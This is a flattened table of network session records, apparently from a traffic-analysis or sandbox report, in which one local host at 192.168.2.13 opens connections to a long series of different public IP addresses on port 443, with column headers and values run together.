                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22103192.168.2.1349268187.250.65.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22104192.168.2.134801052.27.219.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22105192.168.2.134130035.74.199.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22106192.168.2.135241248.38.110.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22107192.168.2.134169884.168.210.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22108192.168.2.1343566103.8.196.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22109192.168.2.1353150197.11.52.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22110192.168.2.1342488126.227.116.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22111192.168.2.133302658.110.6.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22112192.168.2.1349954211.70.83.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22113192.168.2.1352330207.233.58.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22114192.168.2.1347146196.120.197.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22115192.168.2.1336258185.104.239.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22116192.168.2.135411025.85.20.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22117192.168.2.1343694110.157.187.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22118192.168.2.135589274.184.159.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22119192.168.2.1335134209.164.227.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22120192.168.2.1346492200.11.220.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22121192.168.2.134245483.213.249.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22122192.168.2.1360846163.184.130.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22123192.168.2.134541463.194.162.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22124192.168.2.134912245.118.241.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22125192.168.2.1335804157.41.225.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22126192.168.2.1338578217.12.180.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22127192.168.2.135497413.17.149.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22128192.168.2.1338546102.103.38.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22129192.168.2.133849845.132.145.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22130192.168.2.1335088112.142.70.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22131192.168.2.134342263.12.207.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22132192.168.2.1352620198.231.173.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22133192.168.2.1346972154.201.19.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22134192.168.2.1346294114.91.34.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22135192.168.2.13560925.246.19.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22136192.168.2.1334938114.160.154.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22137192.168.2.134054698.13.71.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22138192.168.2.133917877.52.206.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22139192.168.2.1351430200.90.226.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22140192.168.2.1351974105.94.61.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22141192.168.2.135028277.24.197.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22142192.168.2.135568627.167.10.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22143192.168.2.134739097.131.32.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22144192.168.2.13351965.95.94.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22145192.168.2.1338256174.186.136.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22146192.168.2.135737836.20.48.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22147192.168.2.134208270.185.154.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22148192.168.2.135096488.107.60.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22149192.168.2.135467880.97.48.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22150192.168.2.1335784121.217.189.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22151192.168.2.1335902124.138.191.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22152192.168.2.1347130143.218.163.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22153192.168.2.1343934202.208.170.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22154192.168.2.1360930147.44.191.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22155192.168.2.133391275.73.221.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22156192.168.2.1358420163.20.80.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22157192.168.2.1340808144.102.199.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22158192.168.2.1347728182.102.234.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22159192.168.2.1355988184.230.32.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22160192.168.2.1341056159.250.125.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22161192.168.2.1351374213.190.183.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22162192.168.2.1359186149.122.152.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22163192.168.2.135041436.129.99.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22164192.168.2.1333078123.131.214.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22165192.168.2.135935096.34.120.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22166192.168.2.135844235.124.206.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22167192.168.2.134798819.240.251.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22168192.168.2.133761247.96.33.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22169192.168.2.1356116191.183.211.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22170192.168.2.1343166153.180.207.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22171192.168.2.1353690126.215.104.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22172192.168.2.134311474.60.200.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22173192.168.2.133519670.89.233.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22174192.168.2.135493041.29.147.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22175192.168.2.134501295.35.193.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22176192.168.2.1338954219.143.210.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22177192.168.2.134295435.227.227.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22178192.168.2.1336414177.112.68.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22179192.168.2.1355890139.55.172.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22180192.168.2.135159212.139.184.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22181192.168.2.1346464190.26.25.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22182192.168.2.1357366222.127.133.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22183192.168.2.1354592113.105.174.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22184192.168.2.1333770131.11.106.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22185192.168.2.1333710104.187.23.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22186192.168.2.1347140184.213.109.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22187192.168.2.1343050142.140.181.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22188192.168.2.135513812.12.10.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22189192.168.2.133642080.32.150.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22190192.168.2.133389251.120.63.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22191192.168.2.134652885.85.206.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22192192.168.2.1356418158.248.196.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22193192.168.2.1338386148.157.72.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22194192.168.2.135671295.181.29.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22195192.168.2.134764469.94.246.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22196192.168.2.1349504149.60.53.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22197192.168.2.133297235.243.26.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22198192.168.2.1360176152.199.234.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22199192.168.2.134871452.137.71.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22200192.168.2.133701671.172.102.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22201192.168.2.1347724129.110.132.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22202192.168.2.135588053.100.185.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22203192.168.2.1345328106.235.237.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22204192.168.2.1359118213.177.11.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22205192.168.2.1344408199.101.80.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22206192.168.2.1355308187.151.151.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22207192.168.2.134446424.251.176.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22208192.168.2.1336136194.125.164.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22209192.168.2.1350212128.188.25.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22210192.168.2.1353240102.130.7.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22211192.168.2.1344426176.48.214.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22212192.168.2.1351564168.47.114.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22213192.168.2.134019668.196.14.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22214192.168.2.1347700136.100.159.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22215192.168.2.1346024133.156.213.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22216192.168.2.1343908170.57.223.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22217192.168.2.1333348144.106.43.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22218192.168.2.136062894.187.214.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22219192.168.2.1351586112.31.197.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22220192.168.2.135658487.34.25.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22221192.168.2.1360978159.111.240.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22222192.168.2.1334564212.239.35.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22223192.168.2.1343562135.138.167.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22224192.168.2.1359334117.180.63.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22225192.168.2.1347668146.95.230.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22226192.168.2.1359046111.150.158.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22227192.168.2.134066424.160.187.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22228192.168.2.1356306102.46.200.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22229192.168.2.1360546186.161.47.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22230192.168.2.1346386175.98.104.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22231192.168.2.133940257.7.21.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22232192.168.2.1344724203.105.177.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22233192.168.2.1359284176.251.151.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22234192.168.2.1351212121.202.181.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22235192.168.2.1359450148.105.52.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22236192.168.2.134603673.69.4.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22237192.168.2.135799261.131.86.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22238192.168.2.1357124118.119.41.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22239192.168.2.1347480148.92.231.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22240192.168.2.1349780204.1.236.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22241192.168.2.1343124155.167.146.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22242192.168.2.135863690.233.221.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22243192.168.2.1338588138.123.73.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22244192.168.2.135702282.29.90.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22245192.168.2.13524241.179.20.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22246192.168.2.134494414.167.74.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22247192.168.2.135357275.208.209.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22248192.168.2.1348388193.218.11.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22249192.168.2.1345276151.137.179.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22250192.168.2.135409439.39.202.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22251192.168.2.1348438124.9.22.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22252192.168.2.133724045.46.45.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22253192.168.2.1360854193.199.51.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22254192.168.2.133681891.82.4.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22255192.168.2.1348232178.43.95.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22256192.168.2.134768893.134.61.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22257192.168.2.1345340153.56.77.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22258192.168.2.1350862191.12.67.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22259192.168.2.1353720169.172.137.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22260192.168.2.1339326202.128.180.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22261192.168.2.1350592100.174.65.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22262192.168.2.136034663.235.124.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22263192.168.2.134923289.209.51.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22264192.168.2.135387095.7.10.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22265192.168.2.134549449.42.175.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22266192.168.2.134749286.163.78.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22267192.168.2.1351746156.88.221.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22268192.168.2.1334204172.50.204.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22269192.168.2.1356046209.215.59.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22270192.168.2.135636470.186.217.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22271192.168.2.135449484.48.210.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22272192.168.2.1356094152.230.88.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22273192.168.2.134596480.101.104.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22274192.168.2.1344344191.229.70.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22275192.168.2.1333644117.223.152.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22276192.168.2.1338328150.174.77.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22277192.168.2.1336216205.30.139.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22278192.168.2.1341858197.250.231.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22279192.168.2.134302831.89.161.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22280192.168.2.133510878.167.74.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22281192.168.2.1357342153.199.55.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22282192.168.2.135516859.50.23.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22283192.168.2.1339246107.226.90.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22284192.168.2.1351356187.119.166.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22285192.168.2.1339660204.19.71.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22286192.168.2.13561025.42.169.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22287192.168.2.1338972213.72.145.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22288192.168.2.13567865.60.214.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22289192.168.2.135638039.254.123.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22290192.168.2.1339804208.166.136.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22291192.168.2.1341954171.23.59.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22292192.168.2.1333676208.16.249.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22293192.168.2.133702423.201.71.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22294192.168.2.1343990158.38.75.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22295192.168.2.1353768204.59.0.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22296192.168.2.135515649.36.131.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22297192.168.2.135340639.33.250.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22298192.168.2.1348028179.10.251.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22299192.168.2.1359920120.212.58.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22300192.168.2.1352194118.50.97.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22301192.168.2.1338370104.192.34.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22302192.168.2.1335118143.4.158.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22303192.168.2.1346720189.237.128.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22304192.168.2.1338420104.183.193.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22305192.168.2.1346936115.194.3.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22306192.168.2.1337804145.190.52.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22307192.168.2.1357220207.226.33.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22308192.168.2.1335560198.76.80.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22309192.168.2.133978483.129.44.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22310192.168.2.1351476168.253.89.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22311192.168.2.134523879.114.125.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22312192.168.2.1344820193.56.88.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22313192.168.2.1348592221.117.136.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22314192.168.2.1347718217.194.58.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22315192.168.2.1335484211.51.174.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22316192.168.2.134822898.37.135.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22317192.168.2.134623879.38.243.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22318192.168.2.134315841.53.73.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22319192.168.2.134116283.203.58.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22320192.168.2.135831289.130.48.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22321192.168.2.1341376187.86.175.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22322192.168.2.1356496220.69.154.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22323192.168.2.1358416114.97.187.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
